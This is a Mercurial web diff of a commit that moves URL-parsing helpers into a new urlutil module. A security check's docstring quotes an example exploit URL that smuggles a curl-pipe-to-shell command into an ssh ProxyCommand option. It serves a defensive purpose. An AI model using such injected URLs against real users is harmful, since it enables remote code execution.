Mercurial > public > mercurial-scm > hg
comparison mercurial/utils/urlutil.py @ 46907:ffd3e823a7e5
urlutil: extract `url` related code from `util` into the new module
The new module is well fitting for this new code. And this will be useful to
make the gathered code collaborate more later.
Differential Revision: https://phab.mercurial-scm.org/D10374
author | Pierre-Yves David <pierre-yves.david@octobus.net> |
---|---|
date | Mon, 12 Apr 2021 03:01:04 +0200 |
parents | 33524c46a092 |
children | 4452cb788404 |
comparison
equal
deleted
inserted
replaced
46906:33524c46a092 | 46907:ffd3e823a7e5 |
---|---|
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others | 3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others |
4 # | 4 # |
5 # This software may be used and distributed according to the terms of the | 5 # This software may be used and distributed according to the terms of the |
6 # GNU General Public License version 2 or any later version. | 6 # GNU General Public License version 2 or any later version. |
7 import os | 7 import os |
8 import re as remod | |
9 import socket | |
8 | 10 |
9 from ..i18n import _ | 11 from ..i18n import _ |
10 from ..pycompat import ( | 12 from ..pycompat import ( |
11 getattr, | 13 getattr, |
12 setattr, | 14 setattr, |
13 ) | 15 ) |
14 from .. import ( | 16 from .. import ( |
17 encoding, | |
15 error, | 18 error, |
16 pycompat, | 19 pycompat, |
17 util, | 20 urllibcompat, |
18 ) | 21 ) |
22 | |
23 | |
24 if pycompat.TYPE_CHECKING: | |
25 from typing import ( | |
26 Union, | |
27 ) | |
28 | |
29 urlreq = urllibcompat.urlreq | |
30 | |
31 | |
32 def getport(port): | |
33 # type: (Union[bytes, int]) -> int | |
34 """Return the port for a given network service. | |
35 | |
36 If port is an integer, it's returned as is. If it's a string, it's | |
37 looked up using socket.getservbyname(). If there's no matching | |
38 service, error.Abort is raised. | |
39 """ | |
40 try: | |
41 return int(port) | |
42 except ValueError: | |
43 pass | |
44 | |
45 try: | |
46 return socket.getservbyname(pycompat.sysstr(port)) | |
47 except socket.error: | |
48 raise error.Abort( | |
49 _(b"no port number associated with service '%s'") % port | |
50 ) | |
51 | |
52 | |
53 class url(object): | |
54 r"""Reliable URL parser. | |
55 | |
56 This parses URLs and provides attributes for the following | |
57 components: | |
58 | |
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> | |
60 | |
61 Missing components are set to None. The only exception is | |
62 fragment, which is set to '' if present but empty. | |
63 | |
64 If parsefragment is False, fragment is included in query. If | |
65 parsequery is False, query is included in path. If both are | |
66 False, both fragment and query are included in path. | |
67 | |
68 See http://www.ietf.org/rfc/rfc2396.txt for more information. | |
69 | |
70 Note that for backward compatibility reasons, bundle URLs do not | |
71 take host names. That means 'bundle://../' has a path of '../'. | |
72 | |
73 Examples: | |
74 | |
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') | |
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> | |
77 >>> url(b'ssh://[::1]:2200//home/joe/repo') | |
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> | |
79 >>> url(b'file:///home/joe/repo') | |
80 <url scheme: 'file', path: '/home/joe/repo'> | |
81 >>> url(b'file:///c:/temp/foo/') | |
82 <url scheme: 'file', path: 'c:/temp/foo/'> | |
83 >>> url(b'bundle:foo') | |
84 <url scheme: 'bundle', path: 'foo'> | |
85 >>> url(b'bundle://../foo') | |
86 <url scheme: 'bundle', path: '../foo'> | |
87 >>> url(br'c:\foo\bar') | |
88 <url path: 'c:\\foo\\bar'> | |
89 >>> url(br'\\blah\blah\blah') | |
90 <url path: '\\\\blah\\blah\\blah'> | |
91 >>> url(br'\\blah\blah\blah#baz') | |
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> | |
93 >>> url(br'file:///C:\users\me') | |
94 <url scheme: 'file', path: 'C:\\users\\me'> | |
95 | |
96 Authentication credentials: | |
97 | |
98 >>> url(b'ssh://joe:xyz@x/repo') | |
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> | |
100 >>> url(b'ssh://joe@x/repo') | |
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> | |
102 | |
103 Query strings and fragments: | |
104 | |
105 >>> url(b'http://host/a?b#c') | |
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> | |
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) | |
108 <url scheme: 'http', host: 'host', path: 'a?b#c'> | |
109 | |
110 Empty path: | |
111 | |
112 >>> url(b'') | |
113 <url path: ''> | |
114 >>> url(b'#a') | |
115 <url path: '', fragment: 'a'> | |
116 >>> url(b'http://host/') | |
117 <url scheme: 'http', host: 'host', path: ''> | |
118 >>> url(b'http://host/#a') | |
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'> | |
120 | |
121 Only scheme: | |
122 | |
123 >>> url(b'http:') | |
124 <url scheme: 'http'> | |
125 """ | |
126 | |
127 _safechars = b"!~*'()+" | |
128 _safepchars = b"/!~*'()+:\\" | |
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match | |
130 | |
131 def __init__(self, path, parsequery=True, parsefragment=True): | |
132 # type: (bytes, bool, bool) -> None | |
133 # We slowly chomp away at path until we have only the path left | |
134 self.scheme = self.user = self.passwd = self.host = None | |
135 self.port = self.path = self.query = self.fragment = None | |
136 self._localpath = True | |
137 self._hostport = b'' | |
138 self._origpath = path | |
139 | |
140 if parsefragment and b'#' in path: | |
141 path, self.fragment = path.split(b'#', 1) | |
142 | |
143 # special case for Windows drive letters and UNC paths | |
144 if hasdriveletter(path) or path.startswith(b'\\\\'): | |
145 self.path = path | |
146 return | |
147 | |
148 # For compatibility reasons, we can't handle bundle paths as | |
149 # normal URLS | |
150 if path.startswith(b'bundle:'): | |
151 self.scheme = b'bundle' | |
152 path = path[7:] | |
153 if path.startswith(b'//'): | |
154 path = path[2:] | |
155 self.path = path | |
156 return | |
157 | |
158 if self._matchscheme(path): | |
159 parts = path.split(b':', 1) | |
160 if parts[0]: | |
161 self.scheme, path = parts | |
162 self._localpath = False | |
163 | |
164 if not path: | |
165 path = None | |
166 if self._localpath: | |
167 self.path = b'' | |
168 return | |
169 else: | |
170 if self._localpath: | |
171 self.path = path | |
172 return | |
173 | |
174 if parsequery and b'?' in path: | |
175 path, self.query = path.split(b'?', 1) | |
176 if not path: | |
177 path = None | |
178 if not self.query: | |
179 self.query = None | |
180 | |
181 # // is required to specify a host/authority | |
182 if path and path.startswith(b'//'): | |
183 parts = path[2:].split(b'/', 1) | |
184 if len(parts) > 1: | |
185 self.host, path = parts | |
186 else: | |
187 self.host = parts[0] | |
188 path = None | |
189 if not self.host: | |
190 self.host = None | |
191 # path of file:///d is /d | |
192 # path of file:///d:/ is d:/, not /d:/ | |
193 if path and not hasdriveletter(path): | |
194 path = b'/' + path | |
195 | |
196 if self.host and b'@' in self.host: | |
197 self.user, self.host = self.host.rsplit(b'@', 1) | |
198 if b':' in self.user: | |
199 self.user, self.passwd = self.user.split(b':', 1) | |
200 if not self.host: | |
201 self.host = None | |
202 | |
203 # Don't split on colons in IPv6 addresses without ports | |
204 if ( | |
205 self.host | |
206 and b':' in self.host | |
207 and not ( | |
208 self.host.startswith(b'[') and self.host.endswith(b']') | |
209 ) | |
210 ): | |
211 self._hostport = self.host | |
212 self.host, self.port = self.host.rsplit(b':', 1) | |
213 if not self.host: | |
214 self.host = None | |
215 | |
216 if ( | |
217 self.host | |
218 and self.scheme == b'file' | |
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') | |
220 ): | |
221 raise error.Abort( | |
222 _(b'file:// URLs can only refer to localhost') | |
223 ) | |
224 | |
225 self.path = path | |
226 | |
227 # leave the query string escaped | |
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): | |
229 v = getattr(self, a) | |
230 if v is not None: | |
231 setattr(self, a, urlreq.unquote(v)) | |
232 | |
233 def copy(self): | |
234 u = url(b'temporary useless value') | |
235 u.path = self.path | |
236 u.scheme = self.scheme | |
237 u.user = self.user | |
238 u.passwd = self.passwd | |
239 u.host = self.host | |
240 u.path = self.path | |
241 u.query = self.query | |
242 u.fragment = self.fragment | |
243 u._localpath = self._localpath | |
244 u._hostport = self._hostport | |
245 u._origpath = self._origpath | |
246 return u | |
247 | |
248 @encoding.strmethod | |
249 def __repr__(self): | |
250 attrs = [] | |
251 for a in ( | |
252 b'scheme', | |
253 b'user', | |
254 b'passwd', | |
255 b'host', | |
256 b'port', | |
257 b'path', | |
258 b'query', | |
259 b'fragment', | |
260 ): | |
261 v = getattr(self, a) | |
262 if v is not None: | |
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) | |
264 return b'<url %s>' % b', '.join(attrs) | |
265 | |
266 def __bytes__(self): | |
267 r"""Join the URL's components back into a URL string. | |
268 | |
269 Examples: | |
270 | |
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) | |
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' | |
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) | |
274 'http://user:pw@host:80/?foo=bar&baz=42' | |
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) | |
276 'http://user:pw@host:80/?foo=bar%3dbaz' | |
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) | |
278 'ssh://user:pw@[::1]:2200//home/joe#' | |
279 >>> bytes(url(b'http://localhost:80//')) | |
280 'http://localhost:80//' | |
281 >>> bytes(url(b'http://localhost:80/')) | |
282 'http://localhost:80/' | |
283 >>> bytes(url(b'http://localhost:80')) | |
284 'http://localhost:80/' | |
285 >>> bytes(url(b'bundle:foo')) | |
286 'bundle:foo' | |
287 >>> bytes(url(b'bundle://../foo')) | |
288 'bundle:../foo' | |
289 >>> bytes(url(b'path')) | |
290 'path' | |
291 >>> bytes(url(b'file:///tmp/foo/bar')) | |
292 'file:///tmp/foo/bar' | |
293 >>> bytes(url(b'file:///c:/tmp/foo/bar')) | |
294 'file:///c:/tmp/foo/bar' | |
295 >>> print(url(br'bundle:foo\bar')) | |
296 bundle:foo\bar | |
297 >>> print(url(br'file:///D:\data\hg')) | |
298 file:///D:\data\hg | |
299 """ | |
300 if self._localpath: | |
301 s = self.path | |
302 if self.scheme == b'bundle': | |
303 s = b'bundle:' + s | |
304 if self.fragment: | |
305 s += b'#' + self.fragment | |
306 return s | |
307 | |
308 s = self.scheme + b':' | |
309 if self.user or self.passwd or self.host: | |
310 s += b'//' | |
311 elif self.scheme and ( | |
312 not self.path | |
313 or self.path.startswith(b'/') | |
314 or hasdriveletter(self.path) | |
315 ): | |
316 s += b'//' | |
317 if hasdriveletter(self.path): | |
318 s += b'/' | |
319 if self.user: | |
320 s += urlreq.quote(self.user, safe=self._safechars) | |
321 if self.passwd: | |
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars) | |
323 if self.user or self.passwd: | |
324 s += b'@' | |
325 if self.host: | |
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')): | |
327 s += urlreq.quote(self.host) | |
328 else: | |
329 s += self.host | |
330 if self.port: | |
331 s += b':' + urlreq.quote(self.port) | |
332 if self.host: | |
333 s += b'/' | |
334 if self.path: | |
335 # TODO: similar to the query string, we should not unescape the | |
336 # path when we store it, the path might contain '%2f' = '/', | |
337 # which we should *not* escape. | |
338 s += urlreq.quote(self.path, safe=self._safepchars) | |
339 if self.query: | |
340 # we store the query in escaped form. | |
341 s += b'?' + self.query | |
342 if self.fragment is not None: | |
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) | |
344 return s | |
345 | |
346 __str__ = encoding.strmethod(__bytes__) | |
347 | |
348 def authinfo(self): | |
349 user, passwd = self.user, self.passwd | |
350 try: | |
351 self.user, self.passwd = None, None | |
352 s = bytes(self) | |
353 finally: | |
354 self.user, self.passwd = user, passwd | |
355 if not self.user: | |
356 return (s, None) | |
357 # authinfo[1] is passed to urllib2 password manager, and its | |
358 # URIs must not contain credentials. The host is passed in the | |
359 # URIs list because Python < 2.4.3 uses only that to search for | |
360 # a password. | |
361 return (s, (None, (s, self.host), self.user, self.passwd or b'')) | |
362 | |
363 def isabs(self): | |
364 if self.scheme and self.scheme != b'file': | |
365 return True # remote URL | |
366 if hasdriveletter(self.path): | |
367 return True # absolute for our purposes - can't be joined() | |
368 if self.path.startswith(br'\\'): | |
369 return True # Windows UNC path | |
370 if self.path.startswith(b'/'): | |
371 return True # POSIX-style | |
372 return False | |
373 | |
374 def localpath(self): | |
375 # type: () -> bytes | |
376 if self.scheme == b'file' or self.scheme == b'bundle': | |
377 path = self.path or b'/' | |
378 # For Windows, we need to promote hosts containing drive | |
379 # letters to paths with drive letters. | |
380 if hasdriveletter(self._hostport): | |
381 path = self._hostport + b'/' + self.path | |
382 elif ( | |
383 self.host is not None and self.path and not hasdriveletter(path) | |
384 ): | |
385 path = b'/' + path | |
386 return path | |
387 return self._origpath | |
388 | |
389 def islocal(self): | |
390 '''whether localpath will return something that posixfile can open''' | |
391 return ( | |
392 not self.scheme | |
393 or self.scheme == b'file' | |
394 or self.scheme == b'bundle' | |
395 ) | |
396 | |
397 | |
398 def hasscheme(path): | |
399 # type: (bytes) -> bool | |
400 return bool(url(path).scheme) # cast to help pytype | |
401 | |
402 | |
403 def hasdriveletter(path): | |
404 # type: (bytes) -> bool | |
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha() | |
406 | |
407 | |
408 def urllocalpath(path): | |
409 # type: (bytes) -> bytes | |
410 return url(path, parsequery=False, parsefragment=False).localpath() | |
411 | |
412 | |
413 def checksafessh(path): | |
414 # type: (bytes) -> None | |
415 """check if a path / url is a potentially unsafe ssh exploit (SEC) | |
416 | |
417 This is a sanity check for ssh urls. ssh will parse the first item as | |
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. | |
419 Let's prevent these potentially exploited urls entirely and warn the | |
420 user. | |
421 | |
422 Raises an error.Abort when the url is unsafe. | |
423 """ | |
424 path = urlreq.unquote(path) | |
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): | |
426 raise error.Abort( | |
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) | |
428 ) | |
429 | |
430 | |
431 def hidepassword(u): | |
432 # type: (bytes) -> bytes | |
433 '''hide user credential in a url string''' | |
434 u = url(u) | |
435 if u.passwd: | |
436 u.passwd = b'***' | |
437 return bytes(u) | |
438 | |
439 | |
440 def removeauth(u): | |
441 # type: (bytes) -> bytes | |
442 '''remove all authentication information from a url string''' | |
443 u = url(u) | |
444 u.user = u.passwd = None | |
445 return bytes(u) | |
19 | 446 |
20 | 447 |
21 class paths(dict): | 448 class paths(dict): |
22 """Represents a collection of paths and their configs. | 449 """Represents a collection of paths and their configs. |
23 | 450 |
101 return register | 528 return register |
102 | 529 |
103 | 530 |
104 @pathsuboption(b'pushurl', b'pushloc') | 531 @pathsuboption(b'pushurl', b'pushloc') |
105 def pushurlpathoption(ui, path, value): | 532 def pushurlpathoption(ui, path, value): |
106 u = util.url(value) | 533 u = url(value) |
107 # Actually require a URL. | 534 # Actually require a URL. |
108 if not u.scheme: | 535 if not u.scheme: |
109 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) | 536 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) |
110 return None | 537 return None |
111 | 538 |
146 """ | 573 """ |
147 if not rawloc: | 574 if not rawloc: |
148 raise ValueError(b'rawloc must be defined') | 575 raise ValueError(b'rawloc must be defined') |
149 | 576 |
150 # Locations may define branches via syntax <base>#<branch>. | 577 # Locations may define branches via syntax <base>#<branch>. |
151 u = util.url(rawloc) | 578 u = url(rawloc) |
152 branch = None | 579 branch = None |
153 if u.fragment: | 580 if u.fragment: |
154 branch = u.fragment | 581 branch = u.fragment |
155 u.fragment = None | 582 u.fragment = None |
156 | 583 |